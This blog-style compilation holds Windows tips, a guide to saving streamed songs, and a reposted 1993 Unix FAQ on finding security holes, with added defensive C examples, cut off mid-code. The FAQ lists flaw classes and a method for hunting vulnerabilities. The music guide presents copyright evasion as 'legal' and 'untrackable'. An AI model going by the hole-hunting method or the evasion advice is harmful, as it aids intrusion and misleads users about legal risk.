
Tuesday, 05 May 2009

Can't See Secure Sites

Fix for the problem of not being able to see secure sites (banks or online stores). I found this very useful at my work (ISP backbone support, lol; at the time I was regular support).

Anyway, what you need to do is make a new Notepad file and put the following regsvr32 commands in it; just copy-paste these:

regsvr32 SOFTPUB.DLL
regsvr32 WINTRUST.DLL
regsvr32 INITPKI.DLL
regsvr32 dssenh.dll
regsvr32 Rsaenh.dll
regsvr32 gpkcsp.dll
regsvr32 sccbase.dll
regsvr32 slbcsp.dll
regsvr32 Cryptdlg.dll


Then save it with "Save as type" set to "All Files" and name it something like securefix.bat.

Then just run the file and your problem should be gone. This works by re-registering the Windows cryptographic and trust DLLs that Internet Explorer relies on for SSL, so it only helps when those registrations are broken; a site whose certificate fails to validate is a different problem.

Best Keyboard Shortcuts

Getting used to using your keyboard exclusively and leaving your mouse behind will make you much more efficient at performing any task on any Windows system. I use the following keyboard shortcuts every day:

Windows key + R = Run menu

This is usually followed by:
cmd = Command Prompt
iexplore + "web address" = Internet Explorer
compmgmt.msc = Computer Management
dhcpmgmt.msc = DHCP Management
dnsmgmt.msc = DNS Management
services.msc = Services
eventvwr = Event Viewer
dsa.msc = Active Directory Users and Computers
dssite.msc = Active Directory Sites and Services

Windows key + E = Explorer

ALT + Tab = Switch between windows

ALT, Space, X = Maximize window

CTRL + Shift + Esc = Task Manager

Windows key + Break = System properties

Windows key + F = Search

Windows key + D = Hide/Display all windows

CTRL + C = copy

CTRL + X = cut

CTRL + V = paste

Also don't forget about the "Right-click" key next to the right Windows key on your keyboard. Using the arrows and that key can get just about anything done once you've opened up any program.


Keyboard Shortcuts

[Alt] and [Esc] Switch between running applications

[Alt] and letter Select menu item by underlined letter

[Ctrl] and [Esc] Open Program Menu

[Ctrl] and [F4] Close active document or group windows (does not work with some applications)

[Alt] and [F4] Quit active application or close current window

[Alt] and [-] Open Control menu for active document

[Ctrl] and Left/Right arrow Move cursor forward or back one word

[Ctrl] and Up/Down arrow Move cursor forward or back one paragraph

[F1] Open Help for active application

Windows+M Minimize all open windows

Shift+Windows+M Undo minimize all open windows

Windows+F1 Open Windows Help

Windows+Tab Cycle through the Taskbar buttons

Windows+Break Open the System Properties dialog box



Accessibility shortcuts

Right SHIFT for eight seconds....... Switch FilterKeys on and off.

Left ALT + left SHIFT + PRINT SCREEN....... Switch High Contrast on and off.

Left ALT + left SHIFT + NUM LOCK....... Switch MouseKeys on and off.

SHIFT five times....... Switch StickyKeys on and off.

NUM LOCK for five seconds....... Switch ToggleKeys on and off.

Explorer shortcuts

END....... Display the bottom of the active window.

HOME....... Display the top of the active window.

NUM LOCK + ASTERISK (*) on numeric keypad....... Display all subfolders under the selected folder.

NUM LOCK + PLUS SIGN (+) on numeric keypad....... Display the contents of the selected folder.

NUM LOCK + MINUS SIGN (-) on numeric keypad....... Collapse the selected folder.

LEFT ARROW....... Collapse current selection if it's expanded, or select parent folder.

RIGHT ARROW....... Display current selection if it's collapsed, or select first subfolder.




Type the following commands in your Run Box (Windows Key + R) or Start Run

devmgmt.msc = Device Manager
msinfo32 = System Information
cleanmgr = Disk Cleanup
ntbackup = Backup or Restore Wizard (Windows Backup Utility)
mmc = Microsoft Management Console
excel = Microsoft Excel (If Installed)
msaccess = Microsoft Access (If Installed)
powerpnt = Microsoft PowerPoint (If Installed)
winword = Microsoft Word (If Installed)
frontpg = Microsoft FrontPage (If Installed)
notepad = Notepad
wordpad = WordPad
calc = Calculator
msmsgs = Windows Messenger
mspaint = Microsoft Paint
wmplayer = Windows Media Player
rstrui = System Restore
netscp6 = Netscape 6.x
netscp = Netscape 7.x
netscape = Netscape 4.x
waol = America Online
control = Opens the Control Panel
control printers = Opens the Printers Dialog


Internet browser

Type a word such as "google" in the address bar, then press [Right CTRL] and [Enter]:
the browser adds www. and .com to the word and goes to that site.


For Windows XP:

Copy. CTRL+C
Cut. CTRL+X
Paste. CTRL+V
Undo. CTRL+Z
Delete. DELETE
Delete selected item permanently without placing the item in the Recycle Bin. SHIFT+DELETE
Copy selected item. CTRL while dragging an item
Create shortcut to selected item. CTRL+SHIFT while dragging an item
Rename selected item. F2
Move the insertion point to the beginning of the next word. CTRL+RIGHT ARROW
Move the insertion point to the beginning of the previous word. CTRL+LEFT ARROW
Move the insertion point to the beginning of the next paragraph. CTRL+DOWN ARROW
Move the insertion point to the beginning of the previous paragraph. CTRL+UP ARROW
Highlight a block of text. CTRL+SHIFT with any of the arrow keys
Select more than one item in a window or on the desktop, or select text within a document. SHIFT with any of the arrow keys
Select all. CTRL+A
Search for a file or folder. F3
View properties for the selected item. ALT+ENTER
Close the active item, or quit the active program. ALT+F4
Opens the shortcut menu for the active window. ALT+SPACEBAR
Close the active document in programs that allow you to have multiple documents open simultaneously. CTRL+F4
Switch between open items. ALT+TAB
Cycle through items in the order they were opened. ALT+ESC
Cycle through screen elements in a window or on the desktop. F6
Display the Address bar list in My Computer or Windows Explorer. F4
Display the shortcut menu for the selected item. SHIFT+F10
Display the System menu for the active window. ALT+SPACEBAR
Display the Start menu. CTRL+ESC
Display the corresponding menu. ALT+Underlined letter in a menu name
Carry out the corresponding command. Underlined letter in a command name on an open menu
Activate the menu bar in the active program. F10
Open the next menu to the right, or open a submenu. RIGHT ARROW
Open the next menu to the left, or close a submenu. LEFT ARROW
Refresh the active window. F5
View the folder one level up in My Computer or Windows Explorer. BACKSPACE
Cancel the current task. ESC
Prevent the CD from automatically playing. SHIFT when you insert a CD into the CD-ROM drive

Use these keyboard shortcuts for dialog boxes (action, then key):

Move forward through tabs. CTRL+TAB
Move backward through tabs. CTRL+SHIFT+TAB
Move forward through options. TAB
Move backward through options. SHIFT+TAB
Carry out the corresponding command or select the corresponding option. ALT+Underlined letter
Carry out the command for the active option or button. ENTER
Select or clear the check box if the active option is a check box. SPACEBAR
Select a button if the active option is a group of option buttons. Arrow keys
Display Help. F1
Display the items in the active list. F4
Open a folder one level up if a folder is selected in the Save As or Open dialog box. BACKSPACE

If you have a Microsoft Natural Keyboard, or any other compatible keyboard that includes the Windows logo key and the Application key , you can use these keyboard shortcuts:


Display or hide the Start menu. WIN Key
Display the System Properties dialog box. WIN Key+BREAK
Show the desktop. WIN Key+D
Minimize all windows. WIN Key+M
Restores minimized windows. WIN Key+Shift+M
Open My Computer. WIN Key+E
Search for a file or folder. WIN Key+F
Search for computers. CTRL+WIN Key+F
Display Windows Help. WIN Key+F1
Lock your computer if you are connected to a network domain, or switch users if you are not connected to a network domain. WIN Key+ L
Open the Run dialog box. WIN Key+R
Open Utility Manager. WIN Key+U

accessibility keyboard shortcuts:

Switch FilterKeys on and off. Right SHIFT for eight seconds
Switch High Contrast on and off. Left ALT+left SHIFT+PRINT SCREEN
Switch MouseKeys on and off. Left ALT +left SHIFT +NUM LOCK
Switch StickyKeys on and off. SHIFT five times
Switch ToggleKeys on and off. NUM LOCK for five seconds
Open Utility Manager. WIN Key+U

shortcuts you can use with Windows Explorer:


Display the bottom of the active window. END
Display the top of the active window. HOME
Display all subfolders under the selected folder. NUM LOCK+ASTERISK on numeric keypad (*)
Display the contents of the selected folder. NUM LOCK+PLUS SIGN on numeric keypad (+)
Collapse the selected folder. NUM LOCK+MINUS SIGN on numeric keypad (-)
Collapse current selection if it's expanded, or select parent folder. LEFT ARROW
Display current selection if it's collapsed, or select first subfolder. RIGHT ARROW

How To optimize DSL-CABLE connection speed

First, go to Start, then Run, and type regedit in the box. Next, go to the key HKEY_LOCAL_MACHINE\System\CurrentControlSet\VxD\MSTCP.
Now find the string value DefaultRcvWindow and change it to 64240, then restart your computer. There you go: a faster cable-modem connection without downloading a program. The original value is 373360.

Download Free Music Legally

Are you scared that the RIAA is about to track you down for illegally downloading songs? Well, here is a method of obtaining many songs absolutely free that is virtually untrackable by modern technology. It has to do with capturing streaming audio, which in many cases, believe it or not, is just plain old MP3s waiting for you to "download." I have found most of the current top-40 as well as many others you may like, so keep searching. The music is waiting for you to find it.

Step 1:
First of all, you need to find a good site that hosts streaming audio. My favorite that has brought me many songs to date is hxxp://www.windowsmedia.com . Some others are just as good, but this is the site that I will be referencing (plus, I know you guys love to steal from Microsoft).

Step 2:
Alright, go up to the left-hand corner where there is an empty text box. This is the search box; just fill it with a song name or artist, just like you would in Kazaa, and click Search. This will bring up a page with links to many websites hosting a stream by that artist. The ones with music notes are just that: music, which is what you want. In many cases, this is all you need. Just right-click on one of the links and click "Save as" to save the song. This works if the file extension is .mp3, .wma, .asf or another well-known format. If this worked, you are finished; otherwise continue reading.

Step 3:
However, if you encounter a .asx file, there are a few more steps you will have to endure. First of all, do exactly as in the example above and save the file locally. After the file is downloaded, check how large it is. If it is a large file in the megabyte range, then you should be able to play it in your favorite music program. However, if it is less than 1 kilobyte, open it as a text file. You will then see many script commands that speak to Windows Media Player. Don't worry about these; just look for some URLs, which will most likely point to a .asf file. It will have at least one, if not more. Open the newfound URL in your browser and save it as in step 2 and you should be good to go. (I use Mozilla, because Internet Explorer likes to open things rather than save them as I tell it.)

NOTE: If any of the URLs are preceded with "mms://" instead of "http://" find another URL, because this technique will not work.

This technique is especially useful to avoid prosecution because streaming audio, and downloading it appear the same to a web server, therefore you are seen as just another "legal" listener, so "download" away my friend and don't blame me if this soon becomes illegal (if it isn't already).

Step 4:
If you are picky then search for a program that will convert these file types to mp3s. I assure you there are many sites out there.

If this technique does not work for some reason, there is another technique, which is manually recording streaming audio with an audio capture program. I use the one that came with my soundcard (Audigy 2ZS, great soundcard), but I would recommend it only as a last resort, such as with "mms://" files. There is a degradation in quality compared to the other formats, and it records every sound your PC makes while it is recording, so don't chat on AIM while recording (lol, I can hear random doors slamming now).

How to find Security Holes

From: Manifestation
Subject: Security holes manifest themselves in (broadly) four ways...
Date: 11.10.93

( Please contribute by sending E-Mail to ... )

[quoting from the comp.security.unix FAQ]
Security holes manifest themselves in (broadly) four ways:

1) Physical Security Holes.

- Where the potential problem is caused by giving unauthorised persons
physical access to the machine, where this might allow them to perform
things that they shouldn't be able to do.

A good example of this would be a public workstation room where it would
be trivial for a user to reboot a machine into single-user mode and muck
around with the workstation filestore, if precautions are not taken.

Another example of this is the need to restrict access to confidential
backup tapes, which may (otherwise) be read by any user with access to
the tapes and a tape drive, whether they are meant to have permission or
not.

2) Software Security Holes

- Where the problem is caused by badly written items of "privileged"
software (daemons, cron jobs) which can be compromised into doing things
which they shouldn't oughta.

The most famous example of this is the "sendmail debug" hole (see
bibliography) which would enable a cracker to bootstrap a "root" shell.
This could be used to delete your filestore, create a new account, copy
your password file, anything.

(Contrary to popular opinion, crack attacks via sendmail were not just
restricted to the infamous "Internet Worm" - any cracker could do this
by using "telnet" to port 25 on the target machine. The story behind a
similar hole (this time in the EMACS "move-mail" software) is described
in [Stoll].)

New holes like this appear all the time, and your best hopes are to:

a: try to structure your system so that as little software as possible
runs with root/daemon/bin privileges, and that which does is known to
be robust.

b: subscribe to a mailing list which can get details of problems
and/or fixes out to you as quickly as possible, and then ACT when you
receive information.

>From: Wes Morgan
>
> c: When installing/upgrading a given system, try to install/enable only
> those software packages for which you have an immediate or foreseeable
> need. Many packages include daemons or utilities which can reveal
> information to outsiders. For instance, AT&T System V Unix' accounting
> package includes acctcom(1), which will (by default) allow any user to
> review the daily accounting data for any other user. Many TCP/IP packages
> automatically install/run programs such as rwhod, fingerd, and
> tftpd, all of which can present security problems.
>
> Careful system administration is the solution. Most of these programs
> are initialized/started at boot time; you may wish to modify your boot
> scripts (usually in the /etc, /etc/rc, /etc/rcX.d directories) to prevent
> their execution. You may wish to remove some utilities completely.
> For some utilities, a simple chmod(1) can prevent access from unauthorized
> users.
>
> In summary, DON'T TRUST INSTALLATION SCRIPTS/PROGRAMS! Such facilities
> tend to install/run everything in the package without asking you. Most
> installation documentation includes lists of "the programs included in
> this package"; be sure to review it.

3) Incompatible Usage Security Holes

- Where, through lack of experience, or no fault of his/her own, the
System Manager assembles a combination of hardware and software which
when used as a system is seriously flawed from a security point of view.
It is the incompatibility of trying to do two unconnected but useful
things which creates the security hole.

Problems like this are a pain to find once a system is set up and
running, so it is better to build your system with them in mind. It's
never too late to have a rethink, though.

Some examples are detailed below; let's not go into them here, it would
only spoil the surprise.

4) Choosing a suitable security philosophy and maintaining it.

>From: Gene Spafford
>The fourth kind of security problem is one of perception and
>understanding. Perfect software, protected hardware, and compatible
>components don't work unless you have selected an appropriate security
>policy and turned on the parts of your system that enforce it. Having
>the best password mechanism in the world is worthless if your users
>think that their login name backwards is a good password! Security is
>relative to a policy (or set of policies) and the operation of a system
>in conformance with that policy.

---

From: Hacking
Subject: Hacking Ideas
Date: 11/10/93

( Please contribute by sending E-Mail to ... )

[ Many ideas taken from: HaxNet - APG V1.3 : Guide to finding new holes]

NOTE: I think this should be divided into general categories:
1) General principles
2) Looking for holes in src (most items here)
3) Looking in binary distributions
4) Looking in site specific configurations

The following general classifications suggest themselves:
1) SUID/SGID
2) Return codes/error conditions
3) unexpected input
4) race conditions
5) authentication
6) implicit trust
7) parameters
8) permissions
9) interrupts
10) I/O
11) symbolic links
12) Daemons, particularly those taking user input.
13) Kernel race conditions
14) what else? - please add categories

(Suggested splitting of the above into main and sub-categories)
I: Suid binaries and scripts
   unexpected user interactions
   flawed library calls
   implicit assumptions of external conditions (sym links, loc. paths)
   race conditions
II: Daemons running with privileged uids
   race conditions
   poor file protections
   implicit file protections
   trust
   authentication
III: Kernel problems
   kernel race conditions
   device driver code

The following four step method was created by System Development
Corporation, who report a 65% success rate on the flaw hypotheses
generated. Doing a comprehensive search for operating system flaws
requires four steps:

Step 1) Knowledge of system control structure.
===============================================
To find security holes and identify design weaknesses, it is
necessary to understand the system control structure and its layers.
One should be able to list the:
A) security objects: items to be protected. e.g. a user's file.
B) control objects: items that protect security objects. e.g. an i-node.
C) mutual objects: objects in both classes. e.g. the password file.
With such a list, it is possible to graphically represent a control
hierarchy and identify potential points of attack. Making flow charts
to give a visual breakdown of relationships definitely helps.
Reading the various users, operators, and administrators manuals should
provide this information.
(The following paragraphs should probably be moved to a "legal" section.)
Reading and grepping source code should also prove valuable. For those
without a source licence, I would suggest we use LINUX, NET2, and BSD386
distributions in order to stay legal. At some future time we may be able
to form a working contract between someone or a company with legal access
to other distributions and members actively participating in this project.
It appears that extracts of proprietary code may be used for academic
study, so long as they are not reused in a commercial product - more
checking is necessary though.

Step 2) Generate an inventory of suspected flaws. (i.e. flaw hypotheses)
========================================================================
In particular we want:
Code history:
What UNIX src does a particular flavor derive from? This is important
for cross references (very often only one vendor patches certain code,
which may get reused, in its unpatched reincarnation, by others).
A solid cross reference:
Who checked which bug in what OS and what version, so that we don't
duplicate work.

A good start would be listing all the suid binaries on the various OS
flavors/versions. Then try to work out why each program is suid. e.g.:
rcp is suid root because it must use a privileged port to do user
name authentication.
Often code that was never designed to be suid is made suid during
porting to solve file access problems.
We need to develop a database that will be able to look at pairs and
triplets of data, specifically: program name, suid, sgid, object accessed
(why the program is suid/sgid), OS flavor/version, and flavor/version genealogy.
Any suggestions on how to implement such a DB?
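As an added example (not from the FAQ and not anyone's existing tool), here is a first cut at that suid inventory in C. inventory_dir() walks one directory and records every setuid or setgid regular file with its owner, group and mode, which is the (program, suid, sgid, object) row the database described above would hold. All identifiers are this example's own, and inventory_fixture() builds a constructed scratch directory under /tmp so the walker can be exercised without any real setuid binaries on the box.

```c
/* Added example, not part of the FAQ: a first cut at the Step 2 suid
 * inventory. Names (suid_entry, inventory_dir, ...) are this example's own. */
#define _DEFAULT_SOURCE
#include <dirent.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

struct suid_entry {
    char   path[1024];
    uid_t  owner;
    gid_t  group;
    mode_t mode;      /* full st_mode, so the caller can tell suid from sgid */
};

/* Non-zero if the mode bits carry setuid or setgid. */
int is_suid_or_sgid(mode_t m)
{
    return (m & (S_ISUID | S_ISGID)) != 0;
}

/* Walk one directory level (say /usr/bin) and fill `out` with at most `max`
 * regular files that are setuid or setgid. Returns the count, or -1 if the
 * directory cannot be opened. lstat() is used on purpose: a symlink
 * (flaw-list item 11) is reported for what it is, not for what it points at. */
int inventory_dir(const char *dir, struct suid_entry *out, int max)
{
    DIR *d = opendir(dir);
    if (d == NULL)
        return -1;
    int n = 0;
    struct dirent *ent;
    while (n < max && (ent = readdir(d)) != NULL) {
        char path[1024];
        struct stat st;
        if (snprintf(path, sizeof path, "%s/%s", dir, ent->d_name) >= (int)sizeof path)
            continue;                      /* too long: skip, never truncate */
        if (lstat(path, &st) != 0 || !S_ISREG(st.st_mode))
            continue;
        if (!is_suid_or_sgid(st.st_mode))
            continue;
        snprintf(out[n].path, sizeof out[n].path, "%s", path);
        out[n].owner = st.st_uid;
        out[n].group = st.st_gid;
        out[n].mode  = st.st_mode;
        n++;
    }
    closedir(d);
    return n;
}

/* One line per finding, in the shape the text wants to cross-reference. */
void print_inventory(const struct suid_entry *e, int n)
{
    for (int i = 0; i < n; i++)
        printf("%s suid=%d sgid=%d owner=%u group=%u mode=%04o\n", e[i].path,
               (e[i].mode & S_ISUID) != 0, (e[i].mode & S_ISGID) != 0,
               (unsigned)e[i].owner, (unsigned)e[i].group,
               (unsigned)(e[i].mode & 07777));
}

/* Constructed fixture: a scratch directory holding one setuid file, one plain
 * file and one symlink to the setuid file. Returns how many entries
 * inventory_dir() reports for it (expected 1), or -1 if setup failed. */
int inventory_fixture(void)
{
    char dir[] = "/tmp/suidinv_XXXXXX";
    if (mkdtemp(dir) == NULL)
        return -1;
    char suid[1100], plain[1100], link[1100];
    snprintf(suid,  sizeof suid,  "%s/setuid_prog",  dir);
    snprintf(plain, sizeof plain, "%s/plain_prog",   dir);
    snprintf(link,  sizeof link,  "%s/link_to_suid", dir);
    int fd = open(suid, O_WRONLY | O_CREAT, 0755);
    if (fd < 0) return -1;
    close(fd);
    if (chmod(suid, S_ISUID | 0755) != 0)   /* the owner may set it on own file */
        return -1;
    fd = open(plain, O_WRONLY | O_CREAT, 0755);
    if (fd < 0) return -1;
    close(fd);
    if (symlink(suid, link) != 0) return -1;

    struct suid_entry found[16];
    int n = inventory_dir(dir, found, 16);

    unlink(link); unlink(plain); unlink(suid); rmdir(dir);
    return n;
}

int main(int argc, char **argv)
{
    struct suid_entry entries[512];
    const char *dir = argc > 1 ? argv[1] : "/usr/bin";
    int n = inventory_dir(dir, entries, 512);
    if (n < 0) { perror(dir); return 1; }
    print_inventory(entries, n);
    return 0;
}
```

Run it per directory (`./suidinv /usr/bin`, `./suidinv /usr/local/bin`) and diff the output against the vendor's list; items 33 and 34 of the flaw list below are exactly the cases where a locally added or replaced suid binary shows up in that diff.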

Step 3) Confirm hypotheses. (test and exploit flaws)
====================================================

Step 4) Make generalizations of the underlying system weaknesses, for
which the flaw represents a specific instance.
=====================================================================

Tool Box:
=========
AGREP: I suggest everyone obtain, and install agrep from:
ftp cs.arizona.edu /agrep/agrep.tar.Z
Agrep supports "windowing" so it can look for routines, and subroutines.
It also supports logical operators and is thus ideally suited to automating
the search for many of the following flaws. i.e.
agrep WINDOW {suid() NOT taintperl()} /usr/local/*.pl
or
agrep WINDOW {[suid() OR sgid()] AND [system() OR popen() OR execlp() OR execvp()]} /usr/local/src/*.c

PERMUTATION PROGRAM: Another tool worth producing is a program to generate
all possible permutations of command line flags/arguments in order to uncover
undocumented features, and try to produce errors.

TCOV:

CRASH: Posted to USENET (what FTP archive?) (descrip?)

PAPERS: There are several papers that discuss methods of finding flaws, and
present test suites.
1) An Empirical Study of the Reliability of UNIX Utilities, by Barton P.
Miller, Lars Fredriksen, and Bryan So, Comm. ACM, v33 n12, pp32-44,
Dec '90. Describes a test suite for testing random input strings.
Results indicated that 25% of the programs hung, crashed, or misbehaved.
In one case the OS crashed. An understanding of buffer and register
layout in the environment in question, and of the expected input, is likely
to produce the desired results.
2) The Mothra tools set, in Proceedings of the 22nd Hawaii International
Conference on Systems and Software, pages 275-284, Kona, HI, January '89
3) Extending Mutation Testing to Find Environmental Bugs, by Eugene H.
Spafford, Software Practice and Experience, 20(2):181-189, Feb '90
4) A paper by IBM was mentioned that was submitted to USENIX a few years
ago. (Anyone have a citation?).

Specific Flaws to Check For:
============================
1) Look for routines that don't do boundary checking, or verify input.
i.e. the gets() family of routines, where it is possible to overwrite
buffer boundaries. ( sprintf()?, gets(), etc. )
also: strcpy(), which is why most src has a bounded-copy macro such as:
#define SCPYN(a, b) strncpy((a), (b), sizeof(a))
(note that strncpy() does not NUL-terminate when the source fills the buffer)

2) SUID/SGID routines written in one of the shells, instead of C or
PERL.

3) SUID/SGID routines written in PERL that don't use the "taintperl"
program.

4) SUID/SGID routines that use the system(), popen(), execlp(), or
execvp() calls to run something else.

5) Any program that uses relative path names inside the program.

6) The use of relative path names to specify dynamically linked libraries.
(look in Makefile).

7) Routines that don't check error return codes from system calls. (i.e.
fork(2), setuid(2), etc.), as in the famous rcp bug.

8) Holes can often be found in code that:
A) is ported to a new environment.
B) receives unexpected input.
C) interacts with other local software.
D) accesses system files like passwd, L.sys, etc.
E) reads input from a publicly writable file/directory.
F) diagnostic programs which are typically not user-proofed.

9) Test code for unexpected input. Coverage, data flow, and mutation
testing tools are available.

10) Look in man pages, and users guides for warnings against doing X, and
try variations of X. Ditto for "bugs" section.

11) Look for seldom used, or unusual functions or commands - read backwards.
In particular, looking for undocumented flags/arguments may prove useful.
Check flags that were in prior releases, or in other OS versions. Check
for options that other programs might use. For instance telnet uses the -h
option to login ...
right, as most login.c's I've seen have:
if (getuid() && hflag) {            /* -h is honoured only for uid 0 */
    syslog(LOG_ERR, "login: -h for super-user only");
    exit(1);
}

12) Look for race conditions.

13) Failure of software to authenticate that it is really communicating
with the desired software or hardware module it wants to be accessing.

14) Lack of error detection to reset protection mechanisms following an
error.

15) Poor implementation resulting in, for example, condition codes being
improperly tested.

16) Implicit trust: Routine B assumes routine A's parameters are correct
because routine A is a system process.

17) System stores its data or references user parameters in the user's
address space.

18) Inter process communication: return conditions (passwd OK, illegal
parameter, segment error, etc) can provide a significant wedge, esp.
when combined with (17).

19) User parameters may not be adequately checked.

20) Addresses that overlap or refer to system areas.

21) Condition code checks may be omitted.

22) Failure to anticipate unusual or extraordinary parameters.

23) Look for system levels where the modules involved were written by
different programmers, or groups of programmers - holes are likely
to be found.

24) Registers that point to the location of a parameters value instead
of passing the value itself.

25) Any program running with system privileges. (too many progs are given
uid 0, to facilitate access to certain tables, etc.)

26) Group or world readable temporary files, buffers, etc.

27) Lack of threshold values, and lack of logging/notification once these
have been triggered.

28) Changing parameters of critical system areas prior to their execution
by a concurrent process. (race conditions)

29) Inadequate boundary checking at compile time, for example, a user
may be able to execute machine code disguised as data in a data area.
(if text and data areas are shared)

30) Improperly handling user generated asynchronous interrupts. Users
interrupting a process, performing an operation, and either returning
to continue the process or begin another will frequently leave the
system in an unprotected state. Partially written files are left open,
improper writing of protection infraction messages, improper setting
of protection bits, etc often occur.

31) Code that uses fopen(3) without setting the umask. ( eg: at(1), etc. )
In general, code that does not reset the real and effective uid before
forking.

32) Trace is your friend (or truss in SVR4) for helping figure out what
system calls a program is using.

33) Scan /usr/local fs's closely. Many admins will install software from
the net. Often you'll find tcpdump, top, nfswatch, ... suid'd root for
their ease of use.

34) Check suid programs to see if they are the ones originally put on the
system. Admins will sometimes put in a passwd replacement which is less
secure than the distributed version.

35) Look for programs that were there to install software or loadable
kernel modules.

36) Dynamically linked programs in general. Remember LD_PRELOAD, I think
that was the variable.

37) I/O channel programming is a prime target. Look for logical errors,
inconsistencies, and omissions.

38) See if it's possible for a I/O channel program to modify itself, loop
back, and then execute the newly modified code. (instruction pre-load
may screw this up)

39) If I/O channels act as independent processors they may have unlimited
access to memory, thus system code may be modified in memory prior to
execution.

40) Look for bugs requiring flaws in multiple pieces of software, i.e. say
program a can be used to change config file /etc/a now program b assumes
the information in a to be correct and this leads to unexpected results
(just look at how many programs trust /etc/utmp)

41) Any program, especially those suid/sgid, that allow shell escapes.
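Item 1 in working code, as an added example that is not part of the FAQ: SCPYN is the bounded-copy macro the item alludes to, written so it compiles, and it still has a quiet flaw, because strncpy() leaves the destination unterminated when the source fills it exactly, so a later strlen() or printf("%s") reads past the end. safe_copy() is the bounded form that always terminates and reports truncation. The 8-byte field and the field_* helpers are this example's own constructed fixture.

```c
/* Added example, not from the FAQ: bounded copying for flaw-list item 1.
 * Function names and the 8-byte FIELD are this example's own. */
#include <stddef.h>
#include <string.h>

/* The usual macro, corrected; (a) must be a real array for sizeof to work. */
#define SCPYN(a, b) strncpy((a), (b), sizeof(a))

/* Copy src into dst[cap], always NUL-terminating. Returns 0 if src fitted,
 * -1 if bytes were dropped (the caller decides whether that is an error). */
int safe_copy(char *dst, size_t cap, const char *src)
{
    if (cap == 0)
        return -1;
    size_t n = strlen(src);
    if (n >= cap) {
        memcpy(dst, src, cap - 1);
        dst[cap - 1] = '\0';
        return -1;
    }
    memcpy(dst, src, n + 1);            /* includes the terminator */
    return 0;
}

#define FIELD 8   /* size of the constructed destination buffer below */

/* Fill the field the macro way and report what came out: the string length
 * if a terminator survived, -1 if the field is unterminated. */
int field_len_after_strncpy(const char *src)
{
    char field[FIELD];
    memset(field, 'X', sizeof field);   /* makes a missing NUL visible */
    SCPYN(field, src);
    if (memchr(field, '\0', sizeof field) == NULL)
        return -1;
    return (int)strlen(field);
}

/* Same field via safe_copy(): never unterminated, never longer than 7. */
int field_len_after_safe_copy(const char *src)
{
    char field[FIELD];
    memset(field, 'X', sizeof field);
    safe_copy(field, sizeof field, src);
    if (memchr(field, '\0', sizeof field) == NULL)
        return -1;
    return (int)strlen(field);
}

/* safe_copy()'s verdict on whether src fits the field without truncation. */
int fits_in_field(const char *src)
{
    char field[FIELD];
    return safe_copy(field, sizeof field, src) == 0;
}
```

The point of reporting truncation rather than silently clipping is that a setuid program usually wants to reject an over-long argument outright (a path, a username) instead of operating on a different, shorter one.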
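Items 7, 25 and 31 in one routine, as an added example that is not part of the FAQ: the rcp bug item 7 refers to was an unchecked setuid(), so drop_privileges() checks every call and then verifies the outcome instead of assuming it, and run_unprivileged_sh() shows the "reset the uids before forking" half of item 31 by dropping in the child before exec. The function names, the order of operations and the use of /bin/sh are this example's own.

```c
/* Added example, not from the FAQ: checked privilege dropping for flaw-list
 * items 7, 25 and 31. Names are this example's own. */
#define _DEFAULT_SOURCE
#include <grp.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Become (uid, gid) for good. Returns 0 on success, -1 on any failure.
 * Order matters: supplementary groups and the gid must go while we still
 * have the privilege to drop them, and the uid goes last. */
int drop_privileges(uid_t uid, gid_t gid)
{
    if (geteuid() == 0 && setgroups(0, NULL) != 0)   /* only root may clear them */
        return -1;
    if (setgid(gid) != 0)          /* the unchecked form is the classic bug */
        return -1;
    if (setuid(uid) != 0)
        return -1;

    /* Do not trust the calls: verify. If we were meant to end up
     * unprivileged, getting uid 0 back must now be impossible. */
    if (uid != 0 && setuid(0) != -1)
        return -1;
    if (getuid() != uid || geteuid() != uid || getgid() != gid || getegid() != gid)
        return -1;
    return 0;
}

/* Fork, drop to (uid, gid) in the child, then run `cmd` under /bin/sh.
 * Returns the command's exit status, or -1 if fork/wait failed. The child
 * exits 127 rather than run the command still privileged. */
int run_unprivileged_sh(uid_t uid, gid_t gid, const char *cmd)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        if (drop_privileges(uid, gid) != 0)
            _exit(127);
        execl("/bin/sh", "sh", "-c", cmd, (char *)NULL);
        _exit(127);                /* exec failed: never fall back to privileged code */
    }
    int status;
    if (waitpid(pid, &status, 0) != pid || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}
```

Running as an ordinary user, drop_privileges(getuid(), getgid()) succeeds and the setuid(0) probe fails as it should; as root it drops all the way to the requested ids. Either way a -1 means "do not continue", which is the one thing the unchecked original never told its caller.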
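Items 26 and 31 (world-readable files, fopen() without a umask) plus the O_EXCL half of item 11, as an added example that is not part of the FAQ: mode_after_fopen() measures what fopen("w") really creates under a given umask, and create_private() is the form that depends on neither the inherited umask nor on whether someone planted a file or symlink at that path first. Function names and the /tmp scratch directories are this example's own.

```c
/* Added example, not from the FAQ: file creation under a umask, for flaw-list
 * items 11, 26 and 31. Names and scratch paths are this example's own. */
#define _DEFAULT_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Permission bits fopen("w") leaves on a new file under `mask`, measured
 * rather than assumed (fopen asks for 0666; the umask takes bits away).
 * Returns the bits, or -1 on error. A daemon started from a boot script
 * with umask 0 gets the 0666 case: item 26's world-readable temp file. */
int mode_after_fopen(mode_t mask)
{
    char dir[] = "/tmp/umask_demo_XXXXXX";
    if (mkdtemp(dir) == NULL)
        return -1;
    char path[64];
    snprintf(path, sizeof path, "%s/f", dir);

    mode_t old = umask(mask);
    FILE *fp = fopen(path, "w");
    umask(old);                            /* restore for the rest of the process */
    if (fp == NULL) { rmdir(dir); return -1; }

    struct stat st;
    int rc = fstat(fileno(fp), &st);
    fclose(fp);
    unlink(path);
    rmdir(dir);
    return rc == 0 ? (int)(st.st_mode & 0777) : -1;
}

/* Create `path` owner-only, and only if it does not already exist: O_EXCL
 * refuses to follow a pre-planted symlink or reuse someone else's file, and
 * the explicit 0600 does not depend on the umask. Returns the fd or -1. */
int create_private(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
}

/* Constructed check of create_private(): 0 if every property holds, else a
 * negative code saying which one failed. Runs under the worst case, umask 0. */
int private_file_checks(void)
{
    char dir[] = "/tmp/private_demo_XXXXXX";
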